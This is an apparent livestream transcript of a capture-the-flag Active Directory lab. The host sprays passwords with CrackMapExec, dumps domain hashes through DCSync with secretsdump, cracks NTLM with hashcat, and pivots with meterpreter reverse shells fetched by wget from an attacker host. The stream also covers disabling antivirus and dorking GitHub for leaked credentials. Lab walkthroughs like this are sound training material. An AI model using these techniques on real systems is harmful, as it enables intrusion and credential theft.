sequel now. We're doing this thing now that we've dumped a list of users on the domain And we need to generate a word list of users an attempt to password spray Gotcha Yeah, I should probably take note of all of these users real quick So let me select all these in a weird junky way, but I'm gonna do it anyway And I will Remove all the white space and things that are getting in the way here I'll put this into my user names dot text file that I've kept and Now we have that so To password spray domain users with crack map exec or cme You'll first have to format your user list similar to how you format it with hydra That's fine. I just did that after formatting our user list We can use cme to password spray across the domain and gain access to domain accounts We can not only use the user list we got from the database or namely what Or namely, but we can also use a custom password list rather than spraying one password at a time Okay When running the password spray make sure to tunnel it through proxy chains or it won't be able to validate That makes sense After password spraying, um Should we use our old passwords list that we had? Or should we be using rock you? Let's I guess just find out So How much did we have in that passwords list we had a few And we actually know that we have some other passwords in here So Let me throw timekeeper in this username list as we know that And let me open up that passwords dot text list and actually add in some of the others that we know So keeper of time was one of them We also saw in the meme cat's logs. We had Some clear text passwords signed in ftw This is what's good thing we keep our log here password. I'll search for all these passwords entries And just see if I have anything new Sign in ftw There are 39 matches in here. So forgive me for frantic sublime text scrolling but There we go. Blair has a password that we knew of earlier Put that in our password list and No, sorry password Did I miss Something that's the only one. Those are the only clear text ones we had right Okay, gotcha. Yeah, I appreciate it critics. I realized some of the typos. I'm sorry I hope maybe this is good like you like you mentioned like it's kind of cool to walk through this and see some stuff that might be uh I don't know that could be polished Okay, let's do the thing now that we've got this. So let's do proxy chains opt crack map exec cme um smb and the protocol and the machine that we want to get to so 200 24 117 and u for usernames and p for passwords And let's see if we get any hits I'll zoom out on this and let it go. Oh Wait What is happening? I probably should move the domain list up shouldn't I? Yeah, sorry. Let me let me switch the usernames to start With the domain users because I know those are kind of the most valuable ones that we care about right now We'll run that one more time Log on failure. I don't think is a bad thing right now because we are password spraying So we'll see if we get a hit And we are working through these. Okay, so Should I use rock you just in case any of these fail? We are using our common We're using the weak passwords list that we wrote earlier Jackson says no, this is good All right Hopefully we'll get a hit. We know our summer 2020 was in there a little bit I was able to hit a ton of the email accounts when we were Hammering against squirrel mail Which users are you using that we're using the new list of domain users that we just got from the For the database that we pillaged Domain users or that timekeeper users We're using domain users I didn't even go into timekeeper users honestly I guess I should I think I had success using the timekeeper users. Okay Yeah, I probably should have continued to actually uh Use timekeeper users. I probably should have continued to whatever show databases Time keep users. I probably should have continued to pillage this uh database here cd users. What am I doing? uh Whoa flag Okay, let me take note of some of this Thank you Thank you for redirecting me to To do smart things rather than the stupid things that I was doing Did I already submit that flag? You're right. I did That's the exact same flag as earlier Fantastic Well, we have a new list of passwords. So that's kind of handy I don't know what's going on with this white space here. What weirdness that's doing Davies j is in here twice Some of these are funky What is that going on whatever Nothing new. Nothing. Nothing successful yet from cme Peter's j is just a weird one apparently so Okay, we have the right list. Okay. Thank you krillix because I got tired of finagling this list. I don't know why this is weird Like this some blind apparently counts this as a whole line so Did we get any success that I didn't see earlier? Sorry scrolling scrolling scrolling Nothing yet Jeffers d with good old throwback 2020 Yeah Okay, okay We got a hit Jeffers d with throwback 2020 um I wonder if there's another like it would be good to kind of run this again, but uh Like kind of remove some of the others like the users that we went through But if we got a domain user on the domain controller, then I think that's cool Oh, sweet. We're gonna do that dc sync attack We have valid credentials on the domain controller And we need to elevate our privileges so we can dump hashes and enumerate further We can use bloodhound to find potential attack vectors Enumerating dc sync rights with bloodhound The easiest way to enumerate a domain controller is by pulling domain information using sharphound and using bloodhound to visualize the data Remember using task 24. You can kind of refresh your memory on using this I did see That find principles with dc sync rights and that kind of led me down that rabbit hole within bloodhound queries tab You can run that From bloodhound we can find there is a backup account that has d sync rights that we can use to dump the hashes Uh, I don't have bloodhound running anymore. Do I oh, I still do. Whoa. He's just tucked over in the back here All right All right, let's go to throwback.local and shore dc Right. Oh goodness What am I looking at spooks And mercer h What is the backup account? Back up backup at throwback.local has the quickest way Okay, he has get changes and get changes all Maybe that Could be useful also domain controllers To exploit dc sync you need a valid user credentials that have the dc sync rights And we can find backup credentials on the device that gives us valid credentials. What? What? Let me read that one more time Build user credentials that have the dc sync rights We can find backup credentials on the device that give us valid credentials with dc sync rights I'm struggling with that sentence Exploiting a user with dc sync privileges is not as difficult as it sounds thanks to secret stump with an impact it Oh, oh, oh, oh I did this in the Attactive Directory room with That as rep kerber hosting thing enumerate the device first what like an enumerate the dc Can I like log into the thing? I mean, I guess I can now that I know credentials Can I SSH to that that feels weird, but maybe that's a thing dot 117 Yes throwback 2020 On the domain controller Okay We're doing it Let's get that user dot text real quick I am in regular command prompt so I can't use cat. Let's go for type nice nice On the domain controller Yeah, yeah, yeah, yeah, just SSH in the path will be obvious I guess I will have to review that after I Go submit this flag. What is the user flag on that? That is number 13. I love your videos. Thank you so much I really appreciate you watching the videos We're just kind of hanging out keeping it casual here right now And what else was I asking for? What is the root flag on the dc server? I need to be able to like go Like prevask on a main controller. I don't think I'm there yet EFI and update dot ps1 Nope, sorry type update dot ps1 Mmm, that looks peculiar What is EFI? Is it like yufi with boot stuff? Looks like it In the user's directory We've got backup. Can I get in there? Nope Can I get into Any of these web service I'm gonna I'm gonna stand by because I think I need to Do this synchronize here Those are scripts for dns uploading. Okay well To exploit dsync you need valid credentials that have the dc sync rights Exploding a user with dc sync privilege is not very difficult as it just sounds thanks to secret stump So they're using spooks here Is that What I should have done Should I have should I have tracked down spooks as a user or? It's I feel like I can just use jeffersd Yeah I'm gonna try I'm gonna try with jeffersd I feel uncomfortable repeatedly saying jeffersd. I'll be honest, you know Keeping it real Impact it Impact it examples and we have secrets dump secrets dump Python 3 secrets dump And I need to specify the domain controller IP address. I was about to type my local host address 117 and that needs a user Tech You Is that right? No, no, no, no, no. How does that how does that syntax go? throwback jeffers Look for files within jeffersd folders. Okay. Sorry. Thank you I lose connection on that database I did I just gave up dude Find text roger. I will I will continue to look Thank you for putting me on the straight narrow path. He's got stuff in here. Can I just find Fund Whoa Whoa Lord of type. Yeah, I don't think I could really do that on uh Windows Yeah, wrong f word Maybe some good stuff in his downloads Nope How about his documents Backup notice, uh-huh Yeah dirt dirt slash s wouldn't a would work just fine backup notice With a type command because we're in cmd to dxe Hey, yo I'm just gonna save this real quick As we back up the servers all staff are used to backup account for replicating the servers Don't use your domain admin accounts on the backup server the credentials for the backup are tbh backup 238 For the xlex mission point Hans Mercer Okay Are to use this backup account so I could use this I would be able to ssh into that account He does have a backup backup account Okay Yeah, we need a typing room Backup will that work? Yeah, okay, great Now I am that backup user here. So I know those credentials work And I could use dc sync to do this the backup account is the one that has the dc sync rights. Yep. Yeah. Yeah. Yeah, okay I follow I remember you saying And that is what we saw in bloodhound. So that's what we should be able to do Right With secret stomp So that's what I need to run this command with I follow So we ran secret stomp with that dc account and then we would use throwback To get the domain in there backup Backups back back up back up at 10 224 117 It needs the password I can slap that in Would I need to proxy change that? No Do I need to proxy change that? I feel like I need to proxy change that I've been proxy chaining to ssh, didn't I? Yeah. Duh, obviously I follow tbh backup go nice Nice Oh web service A lot of good stuff here Another user stewart little The throwback service The stage service there's tons here so this secrets dump Is Doing the dc sync attack? No Because he has dc sync privileges He can dump credentials on the domain controller So this is me Pulling down all of the credentials on the domain controller Gotcha Okay A lot of numbers there dang This is very cool to see I will admit This this shows me like the danger of like, okay Owning the domain controller, you know, but which one do you want to crack the password for so it'd be I I I think it would be cool to get like that Kerberos the ticket granting ticket service I think If my understanding is correct Or the administrator I'd like to get An account I'd like to get the administrator account here Holy crap. There's so much stuff. Okay. Okay. Okay. Oh, and there's some aspects of the corporate network white screen to scroll through all this and Grab all of this because I want that administrator Secrets dump Look at task 23 reviewing this I remember sequel service had it Oh, sorry. Sorry. I'm looking at I'm looking at a completely separate picture Mercer H Is that enough is that a credentials for you? That's plenty man Is that Mercer H? Yeah Let's get Mercer H's password then Let's try that It's uh It's this thing, right Let me check if this is a easy cheesy peasy crack station thing and then I'll throw it a hash cat No, okay Do I got to get my collab cat running again? Dear god Before I Drive down that Path or actually I feel like I should I will need my rule list this time. Roger. Good to know. Thank you Opsec go bur As you would all say Allow Let's grab this Slept that bad boy in there Actually work because I've realized the problem is that the google copy thing does not do it So Mercer H with this guy Um I need to understand How to specify this ntlm hash because this is an ntlm hash Right So hash cat Example methods ntlm That's just it. I literally just pass it that is that is that all I need to do Okay So Back to collab cat We've got that Guy set and running We'll install hash cat one more time Well, I hope this is uh, was it already? So this is all I mean Let me let me do another one. Well, I feel like I needed to recreate it. I don't know Let's try and find out There's a cell already running. Yeah, because we're trying to freaking compile hash cat again. Damn it I don't know if it would keep the state to be completely honest with you. I just honestly don't know Yeah, it's a new okay. It's a new instance of collab each time. That's good to know We got to wait till we see the said output here and then I know that it's at the end Well, I hope this hasn't been too unbearable for you to watch Especially you krillix because I realized like from the creator's perspective it's easy to see the very architected path and like the trajectory but You know, like as someone going through it, you get the deer in the headlights look would be like I am not connecting the pieces that I'm supposed to be connecting and uh You're like, oh, yeah, I forgot that I need to get this user's credentials Yeah, just no more excel No more windows Hash cat's all good See if he'll run this thing as long as it's like Not my windows Someone owned up two three two and we were certain that wasn't doable. That's awesome. Wow That's cool Dude props to them If you guys stop running now I think it's good. I think I feel like we're good Hash cat Yeah, great so Echo that in So now I have something dot text Which has the hash that I just stole from Mercer So I need hash cat tech m a thousand Tech r. Oh, should I need the rules? I need to go in the other directory. It's drive My drive Dot hash cat right Good, okay, so I'll paste that in one more time and redirect that to like Mercer H dot text cat Mer Good, okay, hash cat tech m a thousand tech r One rule to rule them all dot rule Mercer H dot text And Rock you dot text One oh damn it. I typed in one rules to rule them all Okay, let's let's do this in sublime text to actually know what the heck we're typing. Uh, hash cat tech m a thousand Tech r one rule to rule them all Dot rule Mercer H dot text and rock you dot text Rock you Good save Take a What does that take a do uh Nope, he got it We did it We did it We have his password Using the backup account Which has dc sync writes we could use Secrets dump from impact it to Dump All the hashes on the domain With that Oh, oh, okay, gotcha tack a specifies attack mode and hash cat With that we found Mercer H Password and we were able to crack it With the collab cat and One rule to rule them all So now let's ssh as him ssh Mercer h at 10 224 117 Proxy chains proxy gains Spending my time at the gym with my boy ssh Nice Administrator Got to that desktop boom at last commands fail root dot text type I want powershell Great we did it At least that part cool that should be 14, right? What is the uh admin or what is the root flag on that guy? So let's mark that as completed And let's slap that into four submit Okay We still have not even gotten into corp So I feel like we still got a ways to go This forest has trust issues All right, so we've dumped credentials on the primary domain controller And we can use these credentials to find the other domains or forests that we can gain a foothold on We can begin by using some offensive powershell or bloodhound to find a forest trust And then use credentials to gain access to a segmented domain controller So we did see The in in our previous bloodhound work that we have mapping domain trust and there is a dot local other domain So I'm assuming We're gonna end up doing that also this is a friggin World view in pokemon ruby sapphire and emerald That's awesome Really it's the that's the only important thing to glean from this whole room It's the first forest. Oh my gosh What a beautiful gem Trusts are a mechanism in place for users in the network to gain access to other resources in the domain For the most part trusts outline the way that domains inside of a forest communicate with each other In some environments trust can be extended out to external domains and even forests In that case Okay There are two types of trust that can determine how domains communicate first an outline of the trusts below There's a directional trust where it's only going in one direction The direction of the trusts flows from a trusting domain to a trusted domain A transitive says the trust relationship expands beyond just two domains to include other trusted domains um I think what I've heard to help uh Mentally capture that is that say you are person a And you really like your friend person b Uh, that's just one directional, right? Um, but In a transitive one Let's say your friend person b has other friends person c and d And you can say like your friends friends are your friends So you as individual or person a will also trust c and d Because you know that your buddy likes them right Yeah That's smart. That's That's just how you teach people The type of trust put in place determines how the domain and trees and forests are able to communicate and send data to and from each other When attacking in an active directory environment, you can sometimes abuse these trusts in order to move laterally throughout the network We can be Yeah, so actually with jackson mrs point with directional From what I understand is it is it just a one-way thing the direction of trust flows from a trusting domain to a trusted domain It's not vice versa or is it is it a is it a Pointed one direction trust or is it both way? Is it a two-way street? Transitive person a trust everything the person be trust. That's transitive from what I understand I'm waiting on krillix to tell me the holy word About a bidirectional trust or if it's singular or pointed in one direction Like the band it can be bidirectional. Okay. Is it not strictly? Okay, sorry. I'm going to I'm continuing reading to learn here In this case, we'll probably want a proxy server on the domain controller itself so We should do that Which domain has a trust relationship with throwback dot local? We have corporate dot lower dot local What is the host name of the machine that has a forest trust with the domain controller? How can I tell that host? What is the host name of the machine that has a forest trust? With the domain controller Sorry. Yeah, I was john was like I was I was ice cold frozen there This is just domain trusts, but I want to know the machine Does it tell me? transitive controllers Can I drill into this? Oh, I guess I can Click on corporate local and bloodhound. Okay, uh Let me go back. Thank you first degree trust is on it has one That's just going to be the domain out the machine itself. No, no, no, you're good. You're not wrong I guess I can get on the box now. Can I not? I don't think I even have x free rdp on my machine x free rdp That would be a good thing to have considering I mean, I guess I can do it. Can I can I proxy chains revana? Will that will that work? I don't want to I don't want to exit out of that actually. So let's let's use x free rdp I feel like uh, once we do the rdp on the machine and if we were to like take a look at those domain stuff Then we would be able to totally find. Uh, oh, uh, what what acrylic says dear god and now I'm very concerned Are you just tweaking out about the number of shells open? I was gonna know proxy chaining remana. I follow It could have been either it could have been. Yeah. Yeah, I was gonna say All right Let's proxy chains free rdp Uh, we need to specify the user And that's mercer h in this case and his password is pika pika Choose seven because that's genius and the host 224 117 do I need to specify tack h there attack v terminal Terminal, okay. Oh, I was very concerned for a second That command's gone apparently proxy chains I just completely blanked. I'm sorry x free rdp user mercer h I was gonna say everyone was like, please terminator crash. Please ruin everything again Yeah That's totally my certificate. I trust that baby like no tomorrow, dude boom The roots dots texts. We already got that not a concern um, we can look at server manager and get an idea as to what Active directory stuff is going on here Maybe Active directory domain Nice. Yeah Can I Shut down local server Domains and trusts that sounds interesting Corporate.local Let's explore that There are no items to show Fantastic Can I learn a little bit more about it? If you give me that properties trusts Thorbrach.local it's managed by Straight nothing If I right-click manage, can I do anything with it? Okay Yeah, I was gonna say I'll probably break this on accident as I tend to do corp 80 to one that looks like a potential host We can keep him in mind groups managed service accounts Yes, I'll ruin it. Don't worry This is what you came to see Okay, I feel like I found is that is that corp 80t kind of where I'm where I'm looking here No What is the host name of a machine that has a forest trust with the domain controller? What do I do? How do I find that? Am I not understanding that? I think I figured that out Active directory administrating Is there a trust section in this? No Domain controllers That's the only one There was another file on the desktop. Did you check it out? Excuse me Recycle bin on my desktop Or do you mean the dns update? That I saw in the administrators Desktop I totally didn't check it out and I totally should have Give me the permission, please. Thank you I thought this was just going to be more administrators things More more dns stuff I remember acrylics. I mentioned that they're like no, no, no, don't worry about that And it doesn't look like there's anything extremely interesting here Other than 232 What is 232? Didn't we have that as mail? It's mentioning mail What is that? Oh, that's free rdp Yeah, 232 is mail You were looking at devices on corp. Look for devices on throwback. Oh, I follow. I follow Thank you Thank you for keeping me sane Let me go back to those domains and trusts then And I'll see if there's anything I can do when I manage that thing Throwback.local Has some computers Right That's just going to be dc01. I already have that description b89 Yeah, I do. Okay. You can tell I'm like floundering here I do not normally look at like active directory stuff Those aren't the only computers that it's managing, isn't it? Look at the dns and then attempt the name scan nmap nmap scan Oh Oh Oh Like the dns server here And try to see if it has anything smarter for corporate I don't want I don't I don't need computer management. I need I want the dns I follow I think I think I follow Look at the domain controllers organizational unit in the corp management tab Okay So going back to our domains and trusts going into corporate check out manage and organizational units Is that a thing? Oh god I'm truly sorry This has to be super fainful. I'm truly sorry These are organizational units but domain controllers corp dc01. Oh dear god Did I not see that earlier? Oh my gosh I'm sorry I'm just I'm just like letting it sink in right now that I didn't find that. I'm sorry I'm just I'm just like staring at it more so I can remind myself of how horrendous I So That would make sense, right? because domain controllers Yeah, I was gonna say what it kind of it didn't seem like it was there Maybe I was wrong. I don't maybe I don't know I'm glad jackson. This is backing me up What is the administrator account we can use to access the second forest? Mercer? He's still an admin account What is the name of the file in the administrator's documents folder? There's a file of the administrator's Yeah, yeah, we'll have to look at the video after the fact apparently What am I doing back to my rdp or my my x free rdp There was something in his documents that I completely missed apparently No in mercers documents Blair.bat Hey, yo, why the fudge? I should I should be on oh, oh, oh Wait a second The corporate environment is so so this is corp dc 118 is corpse dc. I follow to get into that Mercer can still reach that So I actually still need to get a proxy chain server on this thing Don't I not? Because I think this dc is the only thing that can actually reach it. I wouldn't be able to ssh into 18 I think Let me find out. I don't think I would be able to reach him No, that's gonna that's gonna choke. So let me get a proxy chains. Uh Let me get that set up on throwbacks dc We do have access to him because Mercer had access throwback 2020 What was this password pika pika pikachu Excuse me. Excuse me. Oh no Get out of here windows excel. I never want to see you ever again in my life Okay No, let's do the power shells Power shells with two ls Incredible, um, let's Get my not a shell going Invoke or let's just do some w get w get http 10 50 22 5 8000 not a shell Dot exe We'll owe that to met dot exe and then What's background my interpreter sessions see what I've got Just to kind of check We have that on time We also have the proxy servers running um I will need a I will need a I feel like I am I misunderstanding this where I'm going to end up having two proxy servers like I'm using wso one to get to the domain controller And I'm going to need the domain controller to get into okay It's a it's a reverse shell so Can I just run auto route and socks for a and it'll be totally fine Chats going like what the heck are you talking about? Oh If it just has the session then it's going to understand that I follow okay I think I follow So if we get met to just friggin respond to us then we're good because it'll auto it'll already have auto routed some of that stuff right so Let's use multi handler Let's set that payload pat load payload to Windows meterpreter reverse tcp Set l host ton zero set l port 4141 Let's get ready to do a dot slash met dot exe over on our victim Let's run that guy whack it And okay, I see the domain controller just kicked through we also had Workstation 01 quick on the trigger We got peter's j coming in Or whoever that was I forget So, uh, we could background that then if we're just kind of good there so I Could proxy chains now to ping 10 200 24 118 It's not going to respond to ping I wouldn't I wouldn't think it would anyway ssh mercer h at that It might out of understanding Should I do Does it need the auto route? Or did I not include my proxy chains? No, I hear I included my proxy chains Did I get rid of the previous auto route? I don't think so I mean I could just I just use auto route again and just kind of do it I'm in session six now I don't think this will break anything But that doesn't get me to 118 Unless I'm misunderstanding and doing it wrong. I got to remove the old one first So Okay, isn't that something that I can do As a script or I guess I would just need to set command to like delete Now I'm just getting sketched out So if I set session four Yeah, inside the session like it should be I can tinker with it right sessions tag. I let's go to six So now I am on the dc and so if I run auto route I can see What I have set up Or at least the examples So we could add here A new subnet I don't want to delete the old one at a route As we have so Run auto route Chrome again is tweaking out on me I'd make sure the stream didn't the stream didn't die Yeah, sorry tech p will print them good call on session four. I want to add one for session five Or session six. So let me go ahead and add 224 slash zero with that S Session mask. Do I need to add do I need to specify that net mask if I delete it? I'm going to get sketched out Well, I will I seriously be able to go ahead and delete it and then like not lose a connection to this thing Dear god, let me typo that three times. So I know Could not delete route Why could I not delete that route? Is that not because I'm actually actively using it You have reverse shell. You'll totally be fine delete session four Now that's deleted theoretically Set session six And set cmd to auto add And now set that up Did not find any new subnets to add. Can I just run add? Make sure that actually works set subnet That's totally fine sessions tack i6 Run auto route with tack p Still at session four and it's not letting me delete it Uh still can ssh Water out auto route tack sd Not the other way around run auto route tack s tack d The current one that we had Did I totally mistyped that earlier and just make a fool of myself? Oh, oh, oh, I needed the slash 24 That's the problem No tack s tack d gets me a syntax error because it looks like it needs to be tack d tack s first but Supplying it afterwards still fumbles Why would it need a dot one? Why Please terminator crash Just reset my mind real quick Why would the interpreter not let me I don't think I feel like I'm not Using I don't feel like I don't have a syntax error. Like am I crazy right now? Does route work as an old command? route What a subnet mask Try giving a session number at the end And session number. I don't know what you're I don't know. I don't know what you're saying if I run auto route tack h Excuse me. I failed that auto route To delete oh, oh, oh Using that syntax you need to use route add and then 10 24 Zero slash 24. Okay, and then the subnet mask Zero and the session number and valid ip address Why do you need an ip address there one or more the arguments are not correct fill that What the fudge Uh Route remove All right, man. I appreciate you like spoon feeding me here because I I I am struggling to death on this. I don't yeah, delete I guess I just googled that that doesn't really help msf console commands. Yeah Scroll down to the route portion I'll take that guy route del You can route flush, but there might be some danger to that. I don't know route Delete let's do a route flush and see how much we break that doesn't know it. Okay msf console commands Yeah, route delete 10 224 0 255 255 255 0 4 That's still whining It's an ip address Subnet mask Still funky Nothing Let's look at all the routes we have route This is all just in this session Right Like when I run that route command as meterpreter or like inside a meterpreter, that's the routes for this specific one Maybe this can help you. I'm scared of what link. You're sending me I'm sketched out I'm sketched out by links. I don't know if that's really what I needed right now Mmm, what should we just like flush it? Should we just redo it? Yeah, don't troll. I got you I almost feel like we want terminated a crash right now Just to like Reset ours That's the thing. Yeah, if we were to crash this we'd lose a reverse shell and we'd lose the access to the We'd lose access to the dc right now. So that wouldn't really help us but I Am racking my brain while we can't add a route And we can't delete one either Yeah, yeah, that would be bad. This doesn't make sense to me. What the heck or you can close msf ssh in production and then from production ssh in the dc And run the metasploit binary Uh, we'd have to like bind to a specific place. Wouldn't we? Hey greasy woot Panam hello Welcome everybody that wanted to come hang out. We are we're riding the struggle bus right now wrestling with meterpreter routes Because we're trying to move into the corporate network inside of throwback But we need another proxy server running on the domain controller itself Still better than wrestling with excel. You're right I can't I can't uh Turn you down there If I set the session to something else does it just do it? delete Run I'd I'll set it on every single session, man Run it on everything Just delete the route, please Please tell me one of those worked What What Is it synt? Is it? Is this syntax didn't work Is that that looks like weird to me 10 200 24 0 slash 24 slash 25 5 5 5 0 that That looks funky honestly Yeah, even if I were to interact with session and try a little route flush. It's like now. That's not a thing anymore So that doesn't help. Maybe that's something for the specific module Oh Yeah Our subnet is wrong Their example says 10 10 10 dot zero Yeah What the boop? Oh my gosh Set cmd to delete set session 4 Please please I was looking at that and I was like Oh my gosh Thanks for sticking with me everybody Have you ever hated yourself so much that you? Okay, okay Okay Now let's set session six and let's set the command to add So when we verify what we're looking at we're actually going to add a route to this thing run Now pretty pretty, please Can I ssh? What is wrong now? I don't understand it. Is that machine just not running? ssh Delete and auto add. Yeah. Yeah. You know what you might be right there. You might be right Show options Do it. Get rid of that. Get rid of that thing Just a little sanly check just make sure i'm not insane uh run No routes currently defined Auto add Show options Session is six For the domain controller Throwback Mercer H on dc1. We're gonna auto add to a regular route on 24 Do it With that I should be able to ssh This is rough This is tough guys Why? Yeah, and this is when terminator crashes, right? See, this is why you should just use ssh shuttle I don't know how I mean Could we ssh shuttle into this? We could ssh shuttle into this could we not Yeah, that actually might work right This is his shuttle It won't work on windows But it has an ssh server Oh, it doesn't have python and it needs that python agent, doesn't it? Uh Yeah, how how is the environment doing maybe maybe the thing just broke and that's why we can't probe 24 minutes left John is dead and triggered inside. How did you know guys? Do I have the wrong ip address or anything? 10 200 24 118 10 224 118 Can I Win rm? I know I know uh, I know proxy change doesn't like win rm Password's wrong. Oh, you're right. You're right. You're right. Thank you. Thank you. Thank you. Good call. Good call Thank you pika pikachu seven pleased your god Give me some access And then I'll just fire another like meterpreter session off in there That's still a little wrong password like just a sanity check pika pikachu seven I passed in pikachu god mother There we go. I want to die. I want to die Okay We're in boys We're in boys and girls Yeah, virtual high five bam You're all incredible. Thank you, especially jackson us For oh roughing that out with me dude Thank you. Thank you We probably could rdp at that point. I mean like you like you said we could probably x free rdp Into him we got we got some stuff in the corp domain Let's let's copy this bad boy And slap it into corp dco one dot text Hi team happy thursday not much on the schedule this week. We're continuing our transition to the new server So please be patient as we make this transition or to access your usual resources Please go to mail dot corporate dot local Well, you will find our new emailing service as well as breach gtfo local Will you find our proprietary breach service that all of you are already used to If you don't already, please add 200 232 for your host file in order to access these resources Uh, yep mail dot corporate dot local Wait, wasn't that The original throwback one 232 is throwback mail As we're auditing our infrastructure Please remember that no personal social media accounts should be connected to company resources such as github If you need to use twitter to make company announcements, please use the tbh security twitter Let's go to twitter boys on stream. Here we go op sec official twitter account for throwback hack security Damn We did it Uh, this is called server update by the way server update dot text Good good Yeah, like and retweet I would I would so retweet it They probably wouldn't appreciate that Uh flag on twitter this guy Let's save that real quick Let's get to our flag dump over here do 21 Just to copy this so we've got it and We need the user flag and root flag So before I go crazy We've got to get to our desktop A lot going on sorry This looks like insanity All right root flag That's 17 Now let's go find us a user Please please please uh spooks You've got to be the only other one What is happening? Anything on that desktop Nothing. Is he in public? We could just use the usual uh get tack Child item Uh, tack recurse And we will look where The name is equal to user dot text See if we got anything that comes through Mercer H had it, okay I thought he was uh I guess a local admin, but you know what beggars can't be choosers And I am begging at this point, so You were in it. Oh, yeah, I'm sorry Did I miss 16 as an answer? Oh, no. Oh that that that's that. Okay I was like, why aren't my numbers adding up? Why aren't they in a regular human sequence? What's the flag on github? Uh, let's go to github.com slash tbh security Nope That's not it Submit the flag though. Did I submit the flag? Did I did I did I not submit the flag? I didn't Thank you Thank you I don't know how the heck you guys key uh tolerate me Thanks. Thanks. Thanks Please remember that no personal social media accounts Should be connected to company resources Don't be afraid to email me Okay Let's get back to our reading And resume progress We're almost at the end guys, holy cow Okay Now that you moved on to a new site by crossing the forestry trust boundary Your team needs to perform initial reconnaissance again This time the oscent and passive recon is up to you go through throwback hack security online presence See what information you can gather about the company to move on to gaining access to the rest of their network Github often has tons of juicy information that is up for grabs at any given time Sensitive data such as api keys or valid credentials are left in the previous commits Which can be viewed by just about anyone the example photo below is found on the type of writing just for searching for Remove password and github and filtering out by commits Google dorking can often lead to some great results that might help you find company github repositories employees or more Yep Once you find the user you want to target you may also want to investigate the github api To see if you can't find any of their sensitive information such as company email addresses And you can check the user's public events history by visiting the following url Below is the sampled result of linus torvalds Nice Okay Now that you know the fundamentals of gathering information from github Utilize your newfound resource to find data leaks from throwback hacks Hey, hello everyone that is saying hello to me Hello, thanks for coming to hang out We got mercer h As a boy for us Who else we got? That's it so Uh github hawn's mercer Throwback what user has a github account Are there other users? Oh goodness there are They just don't have Okay, so now we've got some corp users Sorry, john. Yeah, you have to pipe the google dork results into excel. Don't you dare? Oh god, this sucks. How do I get all these in our new line? Find all control x paste Okay That actually wasn't that bad corp User names Google digs google dorks are pretty neat. I will give you that um I want to Know more about all of these Does this give me the full name? Yeah, it does grace brand grace brand github uh This is this is uncharted territory here. I gotta be careful You know google dorks are pretty neat john, especially if you know the company name throwback site github.com throwback hacks dark star uh Horschark Excuse me. I saw rika fox I do remember her Is she on here? No whatever Nope, no, no, no. I want to rika fox What was the user found in github? um Let me try and save this flag first real quick. Thanks for the incessant nudge Jackson us let's get back to four over here and github flag 18 Yep, and submit the flag good So now we do have this thing And we can search for Yeah, password in this repository That's it She also has a rika fox repository If you found me you're on the right track Thanks These are the only repositories that she has There are nine commits login.php Upload.php database connect That might have a password. Yeah Davies j Is it really him though? Like I feel like we found that previously I guess it is finding credentials on the github And I should note this What else do we need in there? What machine can you access with the credentials? um Should we do like some crack map exec? Or I thought we'd already done this earlier Is that going to bring me into core bety t it is? That's good to know Question is what is core bety t What was the uh get dns request? Power shell Get reverse dns record Is that just it? We did this moments ago And it's lookup No I need to get the host name We did this earlier and I totally forget it now Resolve resolve dns name. Is that in here? That is a thing, isn't it? That probably needs me to fill in a value And I probably just broke the shell with that f Exit Literally anything Please subscribe F in the chat All right, yeah Exiting that shell Resolve resolve The dns name Corp 80t01 Double f's Yeah, I guess ns lookup would actually do that. You're right. I'm sorry I'm being an idiot I don't know why I would have bothered ns lookup Corp 80t01 I didn't need to do a reverse thing. I just need to get the actual address Will that work? How about my x-free rdp jam? I guess the dns server should be ourselves. Shouldn't it be? Or Here I this is a me on the uh, oh, that's true ping should totally work if it's actually a thing What's happening? What? Will you guys need an asmr stream? Yeah Uh, uh That still didn't have any output. You just tweaked out Why? Okay Evil win RM is just Broken How's uh, how's dc1 looking? Let's interact with session six Let's spawn a regular shell Let's ns lookup Please corp 80t01 on the original domain controller Well, I guess we can do our x-free rdp again. We did, um User We we need to proxy change this right we need to proxy chains into U Mercer h Yeah, I should put it on on corp honestly Just to just to like have it And have a shell that isn't garbage attack p pika Pikachu 7 on v 10 200 Uh 24 118 Yeah, I totally trust the certificate absolutely You know me okay Uh, that might just come in handy And actually I guess I can interact with a regular shell there too and not hate my life more than I already do here Let's ns lookup With 10 224 1117 as you suggested and then try that corp 80t01 Well that work We get anything Do we have a shell? Holy cow, you don't know the address I mean that makes sense. We should probably have specified 18 Or is it the other way around? Is server last Should we be doing it? Should we be doing corp 80t and then this our then our dns server that we want to specify? I just uh, I don't I don't remember all that on my head. Is that 10 224 118 It's probably just gonna keep hanging Oh, no, it's not it's definitely it's definitely the other way If we could just use ns lookup and like set it maybe we could see the computer Just use ping that's a good call. Why does that happen? Apparently ping is not the command to run because it will kill your shell Yeah, probably a firewall thing who knows we should be able to see it No, you're good. No, you're good I'm having fun It's got to be in our dns entry. So might as well just look Corp. 80t local is 243 That took longer than it needed to Watch dog mental. Thanks so much Excellent. I'm very I really appreciate you checking out the video I hope you've been enjoying all the fun agonizing pain that I've been going through So Corp 80t 01 is 10 224 243 And we can use the above credentials to log in Awesome. Thanks, Penham. I really appreciate you guys hanging out. I know like Wow six hours is a lot to deal with So, uh, I was like, I don't know why people would want to Thank you. I appreciate the fix right now. We're at hour five for today's dream. So Davies j proxy chains Yeah I uh, I'm I'm est. I'm eastern standard time. So it's one in the morning right now But it says this is the second monster of the night. So Mmm ssh is not having a good time Let's do our evil one RM tack I This bad boy and then tack you. Oh, am I really almost done like this feels kind of crazy Davies j right. Yeah And his password should be management 2018 Please work Please give me something Wait one gosh darn second Do I need a new route? on the corp domain controller? because Right now I'm still only proxying through the throwback dc That got me into corp's domain controller, but I need to be able to see everything else Which means that I'm gonna need. Yeah. Yeah. I need a proxy chains from the corporate dc We're having fun This is fantastic Well, at least at the very very least Let's Take advantage of this Sweet sweet rdp session that we have on that new box So Uh, not a shell is still a thing So in which case we can use our wget http 10 50 22 5 Port 8000 not a shell dot exe And then taco bring it down. We'll call it met Dot exe. I think I have a comma there. That was an accident It grabbed it Maybe It it pulled it down What just happened? No No antivirus You know what? You know what we can do We can use our mshta server Ha ha ha ha We're smarter than that We've got our little macros command here, which can mshta over to this ip address Which should still be running if I take a look at the jobs here. I've got that mshta server still kicking so Let's put our hands together and pray that this actually works I'm going to Drop. Yeah. Oh, yeah, I we actually literally turned off antivirus earlier. So I should I should have saved that command Stop Stop copying a space character No, no, no worries. We we totally could just turn off Antivirus and it was really cool when we did it earlier paste Do the thing delivering payload Will you get that server? Will you get that shell? Uh, should I have started a listener? Use multi handler set payload Windows meterpreter meterpreter preter reverse TCP Set lhost 